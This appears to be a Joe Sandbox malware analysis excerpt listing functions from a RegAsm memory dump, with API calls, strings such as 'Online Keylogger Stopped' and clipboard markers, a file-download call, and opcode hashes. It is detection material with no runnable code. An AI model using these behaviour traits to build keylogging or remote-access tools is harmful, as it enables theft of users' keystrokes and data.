                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3309952895-93608704
                                                                                • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 188215759-0
                                                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                APIs
                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                • String ID:
                                                                                • API String ID: 2633735394-0
                                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                APIs
                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                • String ID:
                                                                                • API String ID: 1761009282-0
                                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                APIs
                                                                                • _free.LIBCMT ref: 1000655C
                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                • String ID: *?$.
                                                                                • API String ID: 2667617558-3972193922
                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alloca_probe_16__freea
                                                                                • String ID: p54
                                                                                • API String ID: 1635606685-674596673
                                                                                • Opcode ID: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                • Opcode Fuzzy Hash: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1291196975-3785015651
                                                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                APIs
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Init_thread_footer__onexit
                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                • API String ID: 1881088180-3686566968
                                                                                • Opcode ID: 459b93ccdfbe79761df0a70f5ac2c7da3f443c0cd847223ec51b5d776f13febb
                                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                • Opcode Fuzzy Hash: 459b93ccdfbe79761df0a70f5ac2c7da3f443c0cd847223ec51b5d776f13febb
                                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/png
                                                                                • API String ID: 1291196975-2966254431
                                                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                                                                • GetFileType.KERNEL32 ref: 00449CCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: (3
                                                                                • API String ID: 3000768030-2570504824
                                                                                • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                                                                • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: (3
                                                                                • API String ID: 269201875-2570504824
                                                                                • Opcode ID: a2428ff8ab59787430994614f1cdcbbcc79b6a8db48f282cb9abbb4e08a31653
                                                                                • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                                                                • Opcode Fuzzy Hash: a2428ff8ab59787430994614f1cdcbbcc79b6a8db48f282cb9abbb4e08a31653
                                                                                • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                                                                APIs
                                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadFileSleep
                                                                                • String ID: !D@
                                                                                • API String ID: 1931167962-604454484
                                                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: : $Se.
                                                                                • API String ID: 4218353326-4089948878
                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                • API String ID: 481472006-2430845779
                                                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: alarm.wav$hYG
                                                                                • API String ID: 1174141254-2782910960
                                                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                APIs
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                • String ID: Online Keylogger Stopped
                                                                                • API String ID: 1623830855-1496645233
                                                                                • Opcode ID: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                • Opcode Fuzzy Hash: af233fb170c3e7993f7e935a79561d089458a16838c3db048d5fa7cce78358a9
                                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                APIs
